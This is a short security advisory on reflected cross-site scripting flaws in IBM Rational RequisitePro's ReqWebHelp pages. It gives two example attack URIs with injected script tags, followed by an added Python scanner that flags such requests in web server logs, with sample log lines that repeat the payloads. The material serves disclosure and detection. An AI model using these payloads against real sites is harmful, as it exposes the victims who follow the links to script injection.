# Title : IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross Site Scripting
# Published : 2009-10-15
# Author : IBM


Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=

http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script>
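
For defenders reviewing web server logs, the following added example (not part of the original advisory or any IBM code) flags requests to the two JSP pages above whose listed parameters carry markup once percent-decoded. The log format, client addresses and function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Paths and parameter names taken from the two example URIs in the advisory.
WATCHED = {
    "/ReqWebHelp/advanced/workingSet.jsp": {"operation", "workingSet"},
    "/ReqWebHelp/basic/searchView.jsp": {"searchWord", "maxHits", "scopedSearch", "scope"},
}
# Characters that let a reflected value break out of an HTML or script context.
MARKUP = re.compile(r"[<>\"']|\*/")
# Common log format: client address first, request line in double quotes.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return sorted names of watched parameters whose decoded value contains markup."""
    parts = urlsplit(request_target)
    watched = WATCHED.get(parts.path)
    if watched is None:
        return []
    hits = set()
    # parse_qsl percent-decodes each value once before the check.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in watched and MARKUP.search(value):
            hits.add(name)
    return sorted(hits)

def scan(log_lines):
    """Yield (client, path, parameter names) for each log line that matches."""
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        params = suspicious_params(m.group(2))
        if params:
            yield m.group(1), urlsplit(m.group(2)).path, params

# Constructed sample lines, not taken from a real server.
SAMPLE = [
    '192.0.2.10 - - [15/Oct/2009:10:00:00 +0000] "GET /ReqWebHelp/basic/searchView.jsp?searchWord=requirements&maxHits=20 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [15/Oct/2009:10:01:12 +0000] "GET /ReqWebHelp/basic/searchView.jsp?searchWord=%3E%27%27%3E%3Cscript%3Ealert(306531)%3C/script%3E&maxHits=20 HTTP/1.1" 200 5342',
    '192.0.2.44 - - [15/Oct/2009:10:02:30 +0000] "GET /ReqWebHelp/advanced/workingSet.jsp?operation=add*/--%3E%3C/script%3E%3Cscript%3Ealert(289325)%3C/script%3E&workingSet= HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Because quote characters are in the pattern, ordinary searches containing an apostrophe will also be flagged; narrow the pattern to angle brackets if that is too noisy for the deployment.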